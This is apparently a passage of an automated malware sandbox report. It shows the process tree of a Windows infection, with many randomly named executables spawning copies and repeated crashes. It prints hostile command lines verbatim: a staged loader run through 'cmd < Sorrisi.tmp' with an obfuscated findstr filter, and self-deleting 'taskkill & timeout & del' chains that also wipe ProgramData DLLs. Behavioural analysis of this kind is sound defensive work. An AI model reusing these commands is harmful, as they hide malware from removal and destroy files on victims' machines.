                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6024
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\SLLaQfXIxqmZ_mjV87ACwT0A.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\SLLaQfXIxqmZ_mjV87ACwT0A.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4460
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\SLLaQfXIxqmZ_mjV87ACwT0A.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\Documents\SLLaQfXIxqmZ_mjV87ACwT0A.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6520
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\SLLaQfXIxqmZ_mjV87ACwT0A.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\Documents\SLLaQfXIxqmZ_mjV87ACwT0A.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6732
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\SLLaQfXIxqmZ_mjV87ACwT0A.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\Documents\SLLaQfXIxqmZ_mjV87ACwT0A.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5688
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\m6HbLQ7HpInsaxQVN_9ft0m4.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\m6HbLQ7HpInsaxQVN_9ft0m4.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6416
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\m6HbLQ7HpInsaxQVN_9ft0m4.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\Documents\m6HbLQ7HpInsaxQVN_9ft0m4.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4104
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\RUp08a6Ht5tbQMWFaZ_rZOYR.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\RUp08a6Ht5tbQMWFaZ_rZOYR.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6120
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5192
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          cmd
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          18⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4772
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              19⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7528
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.002\Acre.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Acre.exe.com k
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                19⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7980
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 30
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  19⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8132
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\iL9Vz1eDqXJ2DsVmitTp9Afx.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\iL9Vz1eDqXJ2DsVmitTp9Afx.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2052
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\BCTRAaFEOh_sGjhwd1LBG7Td.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\BCTRAaFEOh_sGjhwd1LBG7Td.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6720
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\WJu4dJrWJcBZmucYmFcyhS2x.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\WJu4dJrWJcBZmucYmFcyhS2x.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6208
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\WJu4dJrWJcBZmucYmFcyhS2x.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\Documents\WJu4dJrWJcBZmucYmFcyhS2x.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3744
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\WJu4dJrWJcBZmucYmFcyhS2x.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\Documents\WJu4dJrWJcBZmucYmFcyhS2x.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6872
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\WJu4dJrWJcBZmucYmFcyhS2x.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\Documents\WJu4dJrWJcBZmucYmFcyhS2x.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6092
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\GCMwZQzSgK0ZfqR0iB4Jec4O.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\GCMwZQzSgK0ZfqR0iB4Jec4O.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6240
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\GCMwZQzSgK0ZfqR0iB4Jec4O.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\Documents\GCMwZQzSgK0ZfqR0iB4Jec4O.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6032
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\vv_kL83iCvrNozI0RgLuiM79.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\vv_kL83iCvrNozI0RgLuiM79.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5948
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\vv_kL83iCvrNozI0RgLuiM79.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\vv_kL83iCvrNozI0RgLuiM79.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8916
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\YVS7iV1Bib1WPHML4yrKvuLP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\YVS7iV1Bib1WPHML4yrKvuLP.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5704
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\YVS7iV1Bib1WPHML4yrKvuLP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\YVS7iV1Bib1WPHML4yrKvuLP.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6924
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\S11e899IbyacUn8jdIntg5pq.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\S11e899IbyacUn8jdIntg5pq.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5940
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\S11e899IbyacUn8jdIntg5pq.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\Documents\S11e899IbyacUn8jdIntg5pq.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5600
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im S11e899IbyacUn8jdIntg5pq.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\S11e899IbyacUn8jdIntg5pq.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            18⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7344
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                taskkill /im S11e899IbyacUn8jdIntg5pq.exe /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                19⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8044
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                timeout /t 6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                19⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5740
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\Fd4_ngP1YJpIwRy1VSNn8LKE.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\Fd4_ngP1YJpIwRy1VSNn8LKE.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5724
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\Fd4_ngP1YJpIwRy1VSNn8LKE.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\Documents\Fd4_ngP1YJpIwRy1VSNn8LKE.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2124
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\lOyYy6rqvh9jO9XPQZe3gO6R.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\lOyYy6rqvh9jO9XPQZe3gO6R.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6260
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\lOyYy6rqvh9jO9XPQZe3gO6R.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\Documents\lOyYy6rqvh9jO9XPQZe3gO6R.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4396
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\lOyYy6rqvh9jO9XPQZe3gO6R.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\Documents\lOyYy6rqvh9jO9XPQZe3gO6R.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7060
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\EJxSvL36EYXOVFhwPrmoLFiY.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\EJxSvL36EYXOVFhwPrmoLFiY.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6352
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\EJxSvL36EYXOVFhwPrmoLFiY.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\EJxSvL36EYXOVFhwPrmoLFiY.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7844
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\ASaC004IgLa85bUKzMXbYlnG.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\ASaC004IgLa85bUKzMXbYlnG.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6584
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\8L2HI4dn2xqLaMv5dImFxNWS.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\8L2HI4dn2xqLaMv5dImFxNWS.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6600
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\8L2HI4dn2xqLaMv5dImFxNWS.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\8L2HI4dn2xqLaMv5dImFxNWS.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6652
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\dTW_t_I3HziiLc3zXkwjuWR2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\dTW_t_I3HziiLc3zXkwjuWR2.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6636
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\jqLi3WrirxOz9W5K9rLNAvyK.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\jqLi3WrirxOz9W5K9rLNAvyK.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6660
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6660 -s 660
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6740
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6660 -s 672
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6856
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6660 -s 708
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6660 -s 816
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5720
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6660 -s 892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5076
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6660 -s 1080
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:748
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\3AOCLSnEnkd8HzxfaOU5US1m.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\3AOCLSnEnkd8HzxfaOU5US1m.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\3AOCLSnEnkd8HzxfaOU5US1m.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\Documents\3AOCLSnEnkd8HzxfaOU5US1m.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7108
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\5qKtH6OtfkvZHezumLJCxc3a.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\5qKtH6OtfkvZHezumLJCxc3a.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6772
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im 5qKtH6OtfkvZHezumLJCxc3a.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\5qKtH6OtfkvZHezumLJCxc3a.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4788
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    taskkill /im 5qKtH6OtfkvZHezumLJCxc3a.exe /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6372
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    timeout /t 6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6656
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c karotima_2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5192
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS8D1D66E5\karotima_2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                karotima_2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS8D1D66E5\karotima_2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\7zS8D1D66E5\karotima_2.exe" -a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5924
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\mnh3X3tRdYeXIrv7mpvt_BQQ.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\mnh3X3tRdYeXIrv7mpvt_BQQ.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3968
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im mnh3X3tRdYeXIrv7mpvt_BQQ.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\mnh3X3tRdYeXIrv7mpvt_BQQ.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4976
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  taskkill /im mnh3X3tRdYeXIrv7mpvt_BQQ.exe /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  timeout /t 6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3232
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\at3ztcFkiIQSPVwUU_U_ZzQS.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\at3ztcFkiIQSPVwUU_U_ZzQS.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2212
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 660
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4564
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 672
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2556
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
